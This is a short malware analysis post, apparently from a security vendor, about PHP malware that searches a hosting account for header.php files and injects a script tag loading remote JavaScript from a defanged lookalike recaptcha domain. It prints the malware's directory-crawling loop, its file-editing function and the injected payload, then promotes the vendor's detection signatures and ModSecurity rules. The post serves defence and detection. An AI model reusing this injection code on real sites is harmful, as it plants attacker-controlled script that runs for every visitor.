When this malware successful uploaded customer website and access it GET request, it’s trying search backward files and folder, searching header.php files.
$indexFiles = array('header.php');
$dir = path_finder();
$res=smartscan($dir);
foreach($res as $v) {
if(in_array($v, $indexFiles)) {
indexEditor($localpath = $dir, $indexFile = $v, $tag, $code);
} else {
if(is_dir($dir.'/'.$v) && ($v !== ".") && ($v !== "..")) {
$d1[]=$dir.'/'.$v;
}
}
}
indexEditor
When all folders and files searched and header.php files founded, it tries the patch malicious code to header.php file.
function indexEditor($localpath, $indexFile, $tag, $code) {
$fullpath = $localpath.'/'.$indexFile;
edit($fullpath, $code, $tag);
}
Malicious code
In begin this malware have CODE which added wanted file’s:
$tag = '<head>'; $code = <<<CODE <script language="Javascript" src="hxxp://recaptcha-in.pw/myscr532494.js"></script> CODE; $injectType = 1; // 0 - before tag, 1 - after tag
Final words
Use Malware Expert – Malware Signatures detect this malware from files for FREE!
Websites that using Malware Expert – ModSecurity rules are protected against this attacks.